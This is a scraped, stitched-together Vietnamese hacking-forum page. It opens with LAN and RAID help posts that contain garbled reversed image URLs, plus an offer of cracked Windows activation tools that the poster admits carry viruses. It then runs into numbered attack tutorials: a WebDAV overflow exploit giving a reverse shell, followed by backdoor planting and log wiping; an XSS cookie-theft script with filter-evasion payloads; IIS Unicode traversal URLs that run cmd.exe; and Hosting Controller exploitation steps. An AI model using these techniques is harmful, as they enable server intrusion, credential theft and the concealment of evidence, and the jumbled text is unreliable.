
smilie ghet_em smilie Không xọ chuyện nọ sang chuyện kia nhé ANh thật... smilie

tdnduongvn wrote:
Mình nghĩ không như phucnh71 nói
Khi bạn cài WinXP(SP2) xong thì mặc nhiên bạn không thể sharing được.Bạn làm như sau :
Vào Control Panel->network setup wizard
Sau đó bạn cấu hình theo mạng của bạn thì sẽ OK.
Goodluck. 


Bạn đọc kỹ lại phần yêu cầu của tác giả và phần trả lời của tôi.

Trường hợp của bạn noobxxx là máy XP SP2 không cho phép truy cập vào, và máy đó cũng không truy cập sang máy khác được. (Đây là tôi giả sử 3 máy trên cùng lớp mạng) smilie

toantri2005 wrote:
Tôi đi ra ngoài tiệm mua hiện nay thấy trên hộp nó ghi Hup Switch và một đôi lần tôi nối hai hup Switch với nhau bằng cách bấm thẳng vẫn thấy mạng thông bình thường. Xin các huynh hiểu rõ vấn đề này giải thích giúp mình được không. Nếu tôi bấm thẳng thì có ảnh hưởng gì đến tín hiệu mạng không? 


Với các Switch layer 2 or layer 3 thì bấm cáp thẳng bình thường vẫn OK.

Thú thật mình không biết loại "Hup Switch" là loại gì smilie

noobxxx wrote:
Bọn em đang thử làm kết nối 3 máy tính với nhau. 2 máy sử dụng WINXP Pro, 1 cái kia dùng XPSP2. Nhưng 2 cái Pro kết nối rất dễ, tuy nhiên cái SP2 có vấn đề. 2 cái Pro nhìn thấy SP2 trong phần My network places. tuy nhiên khi click vao thì dc dòng thông báo "(XXXX) is not accessible. You might not have permission to use this network resource. Contact the administrator of this server to find out if you have access permissions. The list of servers for this workgroup is not currently available. " cái máy dùng SP2 thi ko nhìn thấy máy nào hết và cũng bị tương tự "(XXXX) is not accessible. You might not have permission to use this network resource. Contact the administrator of this server to find out if you have access permissions. The list of servers for this workgroup is not currently available. ". tất cả 3 máy em đã cho vào cùng 1 workgroup rồi. Mặc dù khi ping thì ok hết. thế mới đau. bác nào gặp phải trượng hợp này rồi sử lý dùm với smilie 


Vấn đề ở đây chính là máy cài bản WinXP SP2. Mình đoán là bạn cài bản này qua đĩa ghost Win XP SP2. Bản cài này hay gặp lỗi như vậy.

Cách khắc phục:
1. Quét virus để đảm bảo hiện tượng trên không phải do virus gây ra.
2. Bạn cài lại bản Win mới. smilie
3. Bạn tạo thêm user trên máy có cài WinXP SP2 có quyền truy cập, sử dụng tài nguyên máy này. Mở khoá cho phép logon trên registry.

Chúc bạn thành công
trong linh vuc nay toi thay co nhieu tu ngu "chuyen nghanh" qua .
co bac nao co the giai dap 1 so tu can ban khong? ( cam on nhieu )  


Phần lớn các từ chuyên ngành này đều có trong Lạc việt từ điển MTD 2002. Các bạn vào đó mà tham khảo.

Lion King wrote:
Tự nhiên máy em mấy hôm nay khi bặt máy lên trước khi vào Windowns nó luôn hiên len cái chưong trình " Gunine Microsoft Software " . Em kô tài nào xoá được nó đi ???

Hình như nó báo là key sử dụng cho Win của em đã đựoc tìm thấy nhiều trên mạng hay sao ấy

Mong các anh giúp em cái ! :cry:  


Cái này cũng có một loạt các tools do lão PD cho bao gồm:
- WGA Patch 1.5
- Activations
- Bill Gate toolkit reloaded
- Change key.

Nó chạy cũng tốt, đã thử với một vài phiên bản Win, Tuy nhiên, nó cũng chứa khá nhiều virus. trước đây cũng đã upload lên cho anh em dùng nhưng một số đồng chí khi dùng bị nhiễm virus, không diệt được nên lại cho down.
Không biết bạn có thích dùng không????
Tôi co' 1 modem và 2máy, vậy phải dùng phần mềm nào hay đấu nối như thế nào để có thể dùng 1 modem cho 2 máy (không sử dụng Hub). Cám ơn nhiều. 


Thông thường 1 modem ADSL đơn sẽ bao gồm 1 đường RJ45 và 1 đường USB, bạn muốn kết nối 2 máy thì quá đơn giản smilie....
Tuy nhiên, cho mỉnh hỏi nhỏ một chút bạn dùng modem hiệu gì??? loại quay số DialUp hay ADSL ????


KINYO
Người ta sinh ra cái Hub để đon giản hoá task cho mọi người, vậy mà vẫn có những người thích phức tạp hoá vấn đề
Biết ký cái gì đây hả giời ?  


Không nên phát biểu như vậy.
cho mình hỏi khi nối hup 100 với hup 10 có cần theo nguyên tắc gì không! mình đã bấm thẳng nhưng đèn tin hiệu của hup một 100 chỉ sáng có một đèn, hai đèn còn lại thì tắt ngúm,  


1. Nguyên tắc là Switch đứng trước, Hub đứng sau.
2. Bấm cáp thì như ghet_em đã nói
3. Đầu cáp cắm từ switch đi ra thì ở cổng nào cũng được nhưng đầu cắm vào Hub phải là cổng số 1.
4. Bạn nên cho thêm thông tin về hub và switch của bạn smilie


khi nối máy tính vào thì máy tính được cấp một địa chỉ IP lạ hoắc không nằm trong lớp cấp phát địa chỉ Ip của Router ADSL. các huynh giúp tôi với  


Một số các máy tính khi mới bắt đầu cắm vào mạng thì card mạng có một số IP là 169.xxx.xxx.xxx. Cái này bạn chỉ cần đổi lại là xong hoặc nếu trong mạng của bạn có DHCP server thì chọn repair trên status của network là OK roài
Chúc bạn thành công

Bác PXM ơi bài này em post ở đây rồi. /hvaonline/posts/list/131.html

Nhưng cái format của Bác đẹp hơn smilie


Ghi chú : Cũng tương tư như ở các Part trên , một số đoạn trong Part 9 này có tổ hơp HTML codes , JavaScript code và mã phát hiện XSS ...bị chặn bởi Input Validation Filter của HVA , nên chúng đựoc trình bầy dứoi dạng các Image File - PXMMRF  


Cái phần em post không bị chặn bởi Input Validation Filter (hồi đó lão conmale nới cái rule ra smilie)
ảnh
Cách cài RAID mếm dùng Windows 2000 advance server

Bạn có thể tham khảo những tấm hình sau đây để cài RAID. Mình không có nhiều thời gian để viết bài từng bước một, hy vọng những hình ảnh diễn giải dưới đây sẽ có thể giúp bạn cài RAID thành công. Tạm thời mình mới chỉ cài RAID 0, trong nay nếu có thêm thời gian mình sẽ soạn thêm phần cài RAID 1 và RAID 5.

Bạn cũng có thể cài RAID 1 và RAID 5 giống như cách cài của RAID 0 chỉ khác là bạn chọn mục "Mirrored Volume" và "RAID 5-Volume".

Như mình đã đề cập ở trên tất cả các RAID đều được cài thông qua chương trình Disk Management của Windows 2000.
Để có thể cài RAID 0, bạn cần tối thiểu hai hard disk.

Khởi đầu cài RAID thì bạn phải right click vào My Computer rồi chọn mục Manage như "Hình 1"
au đó bạn chọn mục Disk Management ở phần bên trái của windows như "Hình 1"

bmuht_gpj.89092_e1bbd15d662ff9937ae193652dccc1cc/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth
[img]http:/bmuht_gpj.89092_d21a31a2e9584acd1774cb1cbffbc66b/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth/> [img]http://www.htmlonlbmuht_gpj.89092_e0a0bde11156900f8845cc80abe872ae/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthp://www.hvaonline.net/hvabmuht_gpj.89092_6d8db710c4f28f10d25e800625843b84/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthonline.net/hvaonline/uplobmuht_gpj.89092_047c78e44b1b9d82cd5d997db7b35efb/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthhvaonline/upload/2006/6/2bmuht_gpj.89092_ad5eebafb951f3127d19b0a0a09a1662/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth
123
Tác giả: (Someone)

Windows 2000, cũng giống như Windows NT 4.0, vẫn hổ trợ cái được gọi là chương trình RAID, hay còn gọi là "Redundant Array of Independent Disk" hay là "Inexpesive Disk". Với phần mềm RAID, hệ điều hành chịu trách nhiệm về tất cả các chức năng của RAID, và máy chủ không đòi hỏi phải sử dụng phần cứng gọi là "RAID Controller".
Mặc dù phương pháp sử dụng phần mềm sẽ rẻ tiền và tiết kiệm hơn, dĩ nhiên nó có khuyết điểm là chậm hơn, cũng như không đáng tin cậy hơn khi dùng phần cứng. Lưu ý tất cả việc cài đặt RAID với phần mềm đều được làm thông qua Disk Management (Quản lý disk) trong Microsoft Management Control (MMC). Có rất nhiều RAID, tuy nhiên trong phần này sẽ chỉ đề cập đến một số RAID thông dụng như RAID 0, RAID 1, hay RAID 5.

RAID 0
Còn được gọi là "Striped Volume", nó được sử dụng để gia tăng sự truy cập dử liệu. Trong cấu hình RAID 0 này nó có thể hổ trợ từ 2 disk cho đến 32 physical disk, dử liệu được chia đều ra trên các disk, và nó làm việc như là một logical khối (Volume). Mặc dù nó được gọi là RAID (Redundancy Array of Inexpesive Disk), nhưng thật sự trong cấu hình này nó không có "Redundancy". Với cấu hình RAID này, nếu một trong hai disk của khối RAID này rớt thì sự truy cập dử liệu vào khối này sẽ bị mất hết.
bmuht_fig.89092_b15f1dcc03bb2826dba906be4cb61498/22/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth

RAID 1
Cấu hình RAID này còn được gọi là cấu hình "Khối Phản Chiếu" (Mirrored Volume), trong cấu hình này dử liệu được mirrored giữa hai physical disk cho mục đích redundancy. Với RAID 1 tất cả những dử liệu được viết vô volume thứ nhất trong khối mirrored thì nó sẽ được viết vô volume thứ hai trong khối này bởi fault tolerant driver ftdisk.sys.
[img]http:/bmuht_gpj.89092_0957b9a678764a1ca3ba256a272f74bb/22/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthAID 2

Được thiết kế để sử dụng cho các ổ không có có chế tự dộng kiểm tra lỗi, từ khi có các ổ SCSI hiếm khi được sử dụng vì các ổ này đã có sẵn

[img]http://www.htmlonlbmuht_gnp.89092_16d97fe7fe840b1c520d05f57838df69/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthbr/>
Dữ liệu được chia thành byte-level striping và ghi lên đĩa. Để dành một ổ cho việc kiểm tra
Yêu cầu ít nhất có 3 đĩa mới thực hiện đựơc.

[img]/hvabmuht_fig.89092_c80e5ef0cbfc8768441ae91dc82d9272/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth>
Dữ liệu được chia thành block-level striping ( giống như level 0 ) và ghi lên đĩa. Trong trường hợp có một ở bị hỏng, nó sẽ tạo ra một đĩa thay thế từ đĩa parity

[img]/hvaonline/uplobmuht_fig.89092_7a5d167820a876a0f4dc6531e1dcbecf/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthy là loại thường được áp dụng trên các Server do khả năng thực hiện và khả năng phục hồi dữ liệu. RAID 5 thường được biết như là "Stripe set with parity". Trong cấu hình RAID này, nó sử dụng ít nhất là 3 và nhiều nhất là 32 physical disks, không chỉ riêng dử liệu được phân phối đều trên các disk mà những thông tin liên kết cũng được phân phối trên các disks, để chắc chắn rằng dữ liệu sẽ được cấu thành lại nếu một trong những disk độc lập bị rớt. Nói đúng hơn là nếu bất kì disk nào trong khối này bị rớt thì bạn có thể thay đổi một disk mới và nó sẽ tự động cấu hình lại (Rebuild) tất cả những dử liệu đã bị mất.

[img]/hvaonline/upload/2006/6/2bmuht_fig.89092_182d68fe2704f7cc2cae0f8aabbfe09f/22/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthng của RAID 5

[img]/hvaonline/upload/2006/6/23/29e22caaabmuht_gnp.89092_d3685a6997ac59f87284d2aaaac22e92/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthhvaonline/upload/2006/6/23/03b7f441a30307f5bd5ebmuht_fig.89092_7fb61666ec8ce5db5f70303a144f7b30/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthnline/upload/2006/6/23/8425f8fccfd08a709154b25994a9647bmuht_fig.89092_b7469a49952b451907a80dfccf8f5248/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthad/2006/6/23/cdfda7ac66a43b9b89bccbc18b0d172c_29098.gifbmuht_fig.89092_c271d0b81cbccb98b9b34a66ca7adfdc/32/6/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthAID.html
http://www.uni-mainz.de/~neuffer/scsi/what_is_raid.html
http://linas.org/linux/raid.html
Mấy anh online hết rồi mà chả báo cho em
Em login vào bằng acconut cũ (Mulan) không đươc.
Đăng ký lại thì bị báo là đã có account này rồi (lạ nhể), không biết là thằng cha nào nhanh chân hơn hay là anh Conmale vẫn giữ account cho em
May quá gọi điện cho bác Mai mới biết URL mà vào, không thì còn dài cổ. Đề nghị anh Conmale send passsword của account Mulan qua YM cho em. 
hix hix hix

Hôm trước ngồi RTC ở Núi trúc anh chả nói với mày rồi đấy thôi smilie hay là "phê quá" quên mất rồi smilie
50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV :

_ Giới thiệu : Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính .
_ Chuẩn bị : Ngoài những đồ nghề đã giới thiệu ở các bài trước , các bạn hãy vào down thêm www32.brinkster.com/anhdenday/wb.zip extract để ở trong C:\
_ Khai thác :
+ Tìm một trang Web dùng IIS 5.0
+ Vào Dos , vào đặt NETCAT ở chế độ lắng nghe :


CODE
C:\>nx -vv -l -p 53
listening on [any] 53 ... 



Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này .

+ Mở thêm một của sổ DOS nữa .
+ Ta sử dụng WebDAV vừa down về .

c:\wb.exe <IP của máy chủ IIS> <IP của máy tính của mình dùng để tấn công> <cổng lắng nghe> [padding=1,2,3...]

VD :


CODE
C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer

Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND
exploiting ntdll.dll through WebDav [ret: 0x00100010]
Connecting... CONNECTED
Sending evil request... SENT
Now if you are lucky you will get a shell. 


+ Nếu như may mắn bạn có thể lấy được shell của máy chủ IIS . Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó :


CODE
C:\>nc -vv -l -p 53
listening on [any] 53 ...
connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32> <-- OK đã thành công rùi. :mellow: :mellow: :mellow:


+ Khi đã có shell rồi việc đầu tiên là ta sử dụng các lệnh trong Unix để khai thác , sau đó up lên server vài con backdoor , he he . ( Sử dụng con WinShell, Hack Defensed là ok rùi ) .
+ Sau khi làm xong ta sẽ xoá file log , để xác định file log ta thực hiện câu truy vấn sau :


CODE
C:\WINNT\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters /v LogFileDirectory ! REG.EXE VERSION 2.0 



kết quả nó sẽ xuất hiện link để ta xác định file log :


CODE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles 



He he , đường dẫn file log là C:\WINNT\System32\LogFiles
+ Ta tạo một file a.bat trên máy của nạn nhân để thực hiện việc xoá file log này , ta đánh các lệnh sau :


CODE
C:\WINNT\system32>echo iisreset /stop >a.bat ' tạm dừng server IIS
C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>a.bat ' xóa nhật kí của IIS
C:\WINNT\system32>echo iisreset /start >>a.bat ' khởi động lại IIS
C:\WINNT\system32>echo ce >>a.bat ' xóa nhật kí của Event Log
C:\WINNT\system32>echo del a.bat >>a.bat ' xóa file a.bat 



+ Sau đó ta dùng các lệnh sau để cho flie a.bat kia làm việc :


CODE
C:\WINNT\system32>net time \xxx.xxx.xxx.xxx ' lấy thời gian hiện tại của máy chủ 



Nó sẽ cho kết quả như VD sau :


CODE
Current time at \xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PM
The command completed successfully 
.

Như vậy thờI gian hiện tạI trên máy chủ là 15:00 , ta sẽ cho file a.bat làm việc sau 5 phút nữa bằng lệnh sau :


CODE
C:\WINNT\system32>at 15:05 a.bat
Added a new job with job ID = 1 


Ta có thể mặc đinh cho file a.bat tự động làm việc sau bao lâu là tuỳ vào thông số thời gian bạn đưa vào .
Ta thoát khỏi máy chủ bằng lệnh :


CODE
C:\WINNT\system32>exit ' đóng kết nối
sent 207, rcvd 746 


+ Lúc này thì mấy admin có tài thánh cũng ko biết là đã có người thâm nhập.
_ Sau này các bạn muốn quay lại cái server trên thì ta đột nhập trực tiếp thông qua backdoor các bạn đã up lên.
_ Kèm theo file Wb.exe tôi đã để thêm 2 file nữa đó là :
+ xoafilelog.exe : dùng để xoá file log trong server của victim .
+ wbscaniis.xpn : dùng để quét xem server victim có bị lỗi này cho ta khai thác hay không , các bạn tự tìm hiểu để sử dụng chúng nhé.

( Tham khảo từ bài viết của seamoun )

51 . ) Lỗi CROSS SITE SCRIPTING và cách khai thác :

_ Giới thiệu : Lỗi XSS ( tên gọi của Cross-Site Scripting ) nói nôm na là hacker có thể thông qua lỗi này để chèn code vào site hay link để chôm các thông tin quan trọng từ nạn nhân, các thông tin quan trọng ở đây có thể là cookie hoặc username + pass để vào tài khoản 1 ngân hàng nào đó sau đó thông tin này được gửi tới cho hacker .
_ Chuẩn bị :
+ Lấy đoạn code sau save lại thành file cookie.asp rồi up lên host của bạn có hỗ trợ asp ( như brikster.com ) :


CODE
<%
Set x = CreateObject("Scripting.FileSystemObject")
Set y = x.OpenTextFile(Server.MapPath("mask.txt"), 8, true)
y.WriteLine Request.QueryString("cookie")
y.Close
Set y = Nothing
Set x = Nothing
%> 



_ Kiểm tra trang Web bị lỗi :
+ 1 site bất kì bao giờ cũng có 1 hoặc tất cả các phần sau : search results, error messages , Web-form , chủ yếu lỗi XSS nằm ở các phần này , nói chung là XSS có thể xảy ra ở chỗ nào mà người dùng có thể nhập dữ liệu vào và sau đó sẽ nhận được 1 cái gì đó .
+ Cách tìm lỗi ta chia thành 4 bước :
Bước 1 : Mở website cần kiểm tra .
Bước 2 : Bắt đầu kiểm tra , định vị 1 ô tìm kiếm hoặc 1 login form và gửi thông tin đi (nhập thông tin và nhấn submit hay login hay ok gì đó ) , ví dụ nhập chữ "abc" chẳng hạn hay chữ gì cũng được .
Bước 3 : Xác định khả năng site có bị lỗi XSS hay không bằng cách xem thông tin trả về :
Ví dụ bạn thấy như thế này :
"Your search for 'abc' did not find any items"
"Your search for 'abc' returned the following results"
"User 'abc' is not valid"
"Invalid login 'abc'"
hoặc là cái gì đó mà có dính tới chữ "abc" mà bạn nhập vào ban đầu thì 99% thằng này bi XSS

Bước 4 : Chèn code thực sự vào nơi bị lỗi :
chèn cái này :

<script>alert('abc')</script>

vào ô ban nãy và nhấn SUBMIT . Nếu sau đó bạn nhận được 1 popup có chữ "abc" thì thằng này 100% bị dính XSS . Nhưng xin chú ý , thỉnh thoảng vẫn có trường hợp website đó bị dính XSS nhưng vẫn không xuất hiện cái popup thì buộc lòng bạn phải VIEW SOURCES nó ra để xem . Khi view sources nhớ kiếm dòng này<script>alert('abc')</script> , nếu có thì XSS đây rồi .
Một ví dụ khác thường gặp hơn :
Gọi http://sitebiloi.com là site bị dính lỗi XSS và ta tìm được nơi bị lỗi như thế này : http://sitebiloi.com/?page=<script>...<script> , nghĩa là ta có thể chèn code ngay trên thanh ADDRESS .
Tôi không thể trình bày hết mọi tình huống được , cái mà các bạn cần là hiểu ra vấn đề thì bạn sẽ hiểu được khi nào bị lỗi .
_ Khai thác :
+ Lấy lại ví dụ site bị XSS trên thanh address , để lấy cookie của nạn nhân ta làm như thế này :
http://sitebiloi.com/index.asp?page=<script>window.open("http:// địa chỉ trang Web ta vừa up file cookie. asp lên /cookie.asp?cookie="+document.cookie)</script>
thì ngay lập tức đoạn code đã được chèn vào trong web page , và trông như vầy :


CODE
-----------------------------------------------------------
<HTML>
<TITLE> Hello all! </TITLE>
hello
<script>window.open("địa chỉ trang Web ta vừa up file cookie.asp lên /cookie.asp?cookie="+document.cookie)</script>
...
</HTML> 

--------------------------------------------------------------


Với đoạn code này thì trình duyệt sẽ thi hành đoạn code và sau đó sẽ gửi toàn bộ cookie tới cho bạn ở dạng file .txt và bạn chỉ việc mở file này ra xem .
+ Vậy gặp trường hợp nhà quản trị hạn chế sự xâm nhập bằng cách lọc bỏ các ký tự đặc biệt ta phải làm sao ? Các bạn thử cách thay thế các ký tự đó bằng các mã đại diện . VD :

* Nếu "Bộ lọc" loại bỏ 2 kí tự "<" và ">" :
Hacker sẽ dùng "\x3c" và "\x3e" để thay thế và bắt đầu chèn code với

') + ') + '\x3cscript src=http://hostbanupfile.com/cookie.asp?cookie="+document.cookie\x3e\x3c/script\x3e'

Để tìm hiểu thêm về mã đại diện các bạn hãy download tại :
www32.brinkster.com/anhdenday/ascii.zip về nghiên cứu .

+ Biến các đoạn code nguy hiểm thành lời chú giải (comment) :
Ví dụ khi hacker nhập vào <script>code</script> thì sẽ bị chặn như sau :


CODE
<COMMENT>
<!--
code (không được phân tích bởi bộ lọc)
//-->
</COMMENT>  



Vượt qua cái này cũng rất dễ bằng cách dùng thẻ đóng </COMMENT> để đóng cái <COMMENT> kia . Nghĩa là ta chèn cái này vào :

Code:
<script>
</COMMENT>
<img src="http://none" onerror="alert(abc was here);window.open( http://sitebanupfile.com/cookie.asp?cookie...cument.cookie); "></script>



lúc này đoạn lọc code ban đầu trở thành :

<COMMENT>

CODE
<!--
- -->
</COMMENT>
<img src="h*tp://none" onerror="alert(abc was here);window.open( http://sitebanupfile.com/cookie.asp?cookie...cument.cookie); ">
</script>
</COMMENT>  



và thế là bộ lọc bị vô hiệu hoá 1 cách nhanh chóng .

( Dựa theo bài viết của Mask_NBTA )

52 . ) Tìm hiểu về lỗ hổng Unicode trong Microsoft IIS :

_Giới thiệu: Microsoft IIS là một phần mềm web server. Nó chứa tất cả file của một website, và làm chúng có hiệu lực cho mọi người dùng trên internet. Nhưng như tất cả các phần mềm khác, (đặc biệt là của Microsoft) nó có lỗ hỏng bảo mật Unicode trong IIS của Microsoft, nhưng "không may" những người quản trị thì lại không quan tâm đến việc cài đặt những patch fix lỗi đó. Trong bài hướng dẫn này, ta thảo luận về cách mà lỗi này hoạt động, và Tại sao nó hoạt động được.

Khi bạn viếng thăm một website, địa chỉ của file bạn hiện giờ đang xem sẽ giống như sau:

http://www.someserver.com/

Đây là remote address của web server, hiển thị trên thanh address của trình duyệt. Bất kỳ ai cũng có thể truy cập nó trên internet. Khi vào site này, web server sẽ đưa cho bạn file index, (index.html hay ) của root folder web server. Hầu hết những root folder của một web server là:

C:\inetpub\wwwroot

Đây là thư mục local của web servers, nơi cất giữ tất cả các trang chính của website. Vì vậy nếu bạn gõ địa chỉ sau:

http://www.someserver.com/index.html

Ở trình duyệt, web server sẽ đưa cho bạn local file của nó:

c:\inetpub\wwwroot\index.html

Tôi hy vọng bạn sẽ không quá nhàm chán, việc quan trọng nhất là bạn phải hiểu được sự khác nhau giữa địa chỉ local và remote.

Bây giờ, cái gì sẽ xảy ra nếu ta muốn di chuyển một cặp thư mục lên web server? Ta muốn di chuyển từ c:\inetpub\wwwroot Đến c:\ chúng ta sẽ làm như thế nào? Bạn không thể gõ:

http://www.someserver.com/c:\

Chú thích Web server sẽ bắt đầu đi qua local của nó

c:\inetpub\wwwroot

Đối với những thư mục riêng, và do bạn không thể có : trong thư mục, nó sẽ đỗ vỡ và bạn nhận được thông báo lỗi trong trình duyệt.
Tiếc quá! nó không hoạt động.
Nếu đã quen với FTP, thì bạn cũng biết lệnh DIRUP dùng để làm gì.
Lệnh để đi đến một thư mục ở trên là
/../
Nếu bạn thiết kế bất kỳ web hay mã html nào thì chắc chắn bạn sẽ dùng được rất nhiều.
Vì thế ta chỉ đặt lệnh lẫn nhau, giống như sau

http://www.someserver.com/../../

Và bắt đầu truy cập vào ổ đĩa c local của server?
Tốt, ta bắt đầu khai thác ở đây, nhưng người tạo IIS lại muốn tránh phiền phức, bằng cách làm server từ chối loại yêu cầu này.Vì thế ta phải làm gì đây?Bạn có bao giờ thử download một file mà trong tên của nó có khoảng trống chưa?
Bạn có nhận được thông báo là trình duyệt đã biến đổi khoảng trống đó thành %20 không?
Hãy làm 1 ví dụ. Nếu bạn gõ cái này trong trình duyệt:

http://www.someserver.com/iis Unicode hole.txt

Trình duyệt sẽ thay thế khoảng trống bằng %20 :

http://www.someserver.com/iis%20unicode%20hole.txt

Và sau đó mới cho phép bạn download file.
Đó là cái gì, và tại sao trình duyệt lại phải làm như thế?
Máy tính không thể hiểu được khoảng trống. Đơn giản là chúng không làm được vậy thôi.
%20 ở đây chính là Unicode cho ký tự ASCII mà ta hay gọi là “khoảng trống”.
Ký tự ASCII là những ký tự mà ta thấy trên màn hình khi dùng máy tính. Chỉ có một Unicode cho mỗi ký tự ASCII. Vì thế, khi bạn đưa một khoảng trống vào trình duyệt, nó phải được thay thế bằng cái gì mà cho máy tính có thể hiểu được trước khi nó bắt đầu tìm kiếm.
Để tìm hiểu thêm về ASCII các bạn down tại :
www32.brinkster.com/anhdenday/ascii.zip
Từ khi trình duyệt biến đổi khoảng trống thành ký tự Unicode mới và gửi chúng đến web server mà có thể hiểu được, ta cũng có thể dùng ký tự Unicode để giải thích bất cứ thứ gì ta muốn, và web server sẽ cũng hiểu được chúng. Không chỉ với khoảng trống. Mà ta cũng có thể biến đổi lệnh DIRUP thành Unicode, và gửi chúng đến server. Ta cần biến đổi dấu gạch chéo (/) thành /../../ trong Unicode. Unicode của / là %5C .
Thật là tuyệt, nếu sau đó tôi chỉ cần gõ

http://www.someserver.com/..%5C.. %5C/

và tôi có thể thấy host được không?
Khai thác ở đây, nhưng có một vài lý do nó không hoạt động.
Đầu tiên, nếu bạn đã làm với server’s local c:\ Bạn sẽ cần một vài thứ để đóng thư mục. Web server sẽ không làm như vậy cho bạn. Vì vậy chúng ta cần mở cmd.exe (dấu nhắc DOS) của server. Trong trình duyệt của bạn! Nhưng chúng ta sẽ quay lại vấn đề này sau.
Thứ hai, khi server giải mã /..%5C.. %5C/
Nó sẽ thành /../../ mà lại bị hạn chế, và sau đó từ chối yêu cầu. Vì thế ta cần phải làm gì, hay mã hoá Unicode đã mã hóa rồi một lần nữa. Có thể bạn sẽ không theo tôi ngay bây giờ, nhưng tôi sẽ cố gắng giải thích một lần nữa. Ta cần mã hoá mọi ký tự của chuỗi Unicode đã có.
Xem bảng dưới sẽ hiểu hơn.


CODE
ASCII................................. UNICODE
%........................................ %25
5.......................................... %35
C............................ .............%43 


Vì vậy khi ta mã hóa ký tự ASCII /..%5C.. %5C/
Sang Unicode, ta được ..%25%35%43..%25%35%43
Và khi server đọc chuỗi ký tự này, nó sẽ trở lạI /..%5C.. %5C/
Đó không phải là lệnh DIRUP bình thường, nên nó được cho phép.
Nhưng có một vài thứ chúng ta cần biết. Như tôi đã đề cập ở trước, khi bạn kết nối đến một web server, thư mục root mặc định là wwwroot. Thư mục này những trang chính của site. Nhưng có những thư mục khác cho những trang web như yếu tố scripts. Những thư mục này có chứa file mà có khá nhiều thứ quan trọng trong web server. Vì vậy khi vận dụng server, ta cần làm nó từ thư mục mà ta đã có đặc quyền để làm. Điều này không khó; Tôi chỉ muốn bạn hiểu tại sao tôi thêm /scripts/ vào cuối URL.

Rốt cuộc, khi ta thi hành lệnh ở dấu nhắc server’s local dos prompt, ta cần thi hành một lệnh cũng trong cái này. Ta muốn hiển thị c:\ ? Dễ thôi; ta chỉ cần làm vài thủ thuật khác hơn bạn thường làm ở dấu nhắc dos.

Bắt đầu cmd.exe theo cách sau:

cmd.exe?/c+

? = Mọi thứ sau dòng đối số của lệnh.
/c = Thi hành lệnh, sau đó đóng cmd.exe (để cho nó không chạy mãi)
+ = Thay thế cho khoảng trống

Cuối cùng, toàn bộ lệnh ráp lại sẽ như sau:

http://www.myserver.com/scripts/..%25%35%43..%25%35%43/winnt/system32/cmd.exe?/c+dir+c:\

Và bạn thấy được c:\ của servers bên trong trình duyệt. Hehe?

_ Chú thích: Có rất nhiều “lệnh” Unicode khác để cho ta thi hành, nếu cái này không hoạt động (có thể server đã fix được phần nào) thì thử áp dụng những cách sau:


CODE
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\ …….


( Một bài viết rất chất lượng của LeonHart bên www.whatvn.com )

53 . ) Kỹ thuật hack Hosting controller :

_Tìm site bị lỗi : vào Google.com đánh vào một trong các từ khoá sau :

+ copyright Hosting Controller .
+ allinurl:/advadmin .
+ allinurl:/admin .

Sau khi tìm được ta thử xét trang Web đó có bị lỗi hay ko bằng cách sử dụng 2 đoạn code :


CODE
http://www.victim.com/advwebadmin*hoac admin*/stats/statsbrowse.asp?filepath=c:\&Opt=3
( Lệnh này xem ổ đĩa của victim )  


www.victim.com/advwebadmin/autosignup/newwebadmin.asp
( Lệnh này tạo một free hosting )


Nếu như 2 lệnh trên cùng thực hiên được thì ta có thể khai thác chúng được rồi đó , he he .
_ Cách khai thác :
+ Vì tạo được hosting nên ta có thể upload được file vô tư , các bạn hãy chú ý thử xem địa chỉ mà cất các file ta vừa upload lên ở đâu ( bằng cách nhìn vào thanh statup ) .
+ Tiếp theo là ta làm sao chuyển cái file đó vào thư mục chứa trang chủ của nạn nhân , theo mặc định nó sẽ nằm ở đây :

C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\
( Các bạn có thể thay ổ C:\ bằng D:\ , E:\ )

+ Khi xác định được chính xác địa chỉ rùi ta sẽ tìm đoạn script để làm giúp :

